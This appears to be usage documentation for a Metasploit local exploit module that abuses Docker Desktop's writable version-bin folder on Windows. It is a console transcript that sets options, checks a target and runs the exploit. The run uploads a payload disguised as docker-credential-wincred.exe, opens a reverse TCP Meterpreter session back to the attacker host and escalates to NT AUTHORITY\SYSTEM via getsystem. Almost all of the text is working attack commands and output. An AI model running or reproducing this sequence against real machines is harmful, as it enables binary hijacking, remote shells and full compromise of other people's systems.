Docker Credential Wincred

msf exploit(windows/local/docker_credential_wincred) > show options

Module options (exploit/windows/local/docker_credential_wincred):

 Name         Current Setting                            Required  Description
 ----         ---------------                            --------  -----------
 PROGRAMDATA  C:\ProgramData\DockerDesktop\version-bin\  no        Path to docker version-bin.
 SESSION                                                 yes       The session to run this module on.


Exploit target:

 Id  Name
 --  ----
 0   Automatic


msf exploit(windows/local/docker_credential_wincred) > set session 1
session => 1
msf exploit(windows/local/docker_credential_wincred) > check

[*] Docker version 18.09.0, build 4d60db4
[*] The target appears to be vulnerable.
msf exploit(windows/local/docker_credential_wincred) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Docker version 18.09.0, build 4d60db4
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] payload_pathname = C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Making Payload
[*] Uploading Payload to C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Payload Upload Complete
[*] Waiting for user to attempt to login
[*] Sending stage (180291 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49766) at 2020-04-15 16:32:09 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM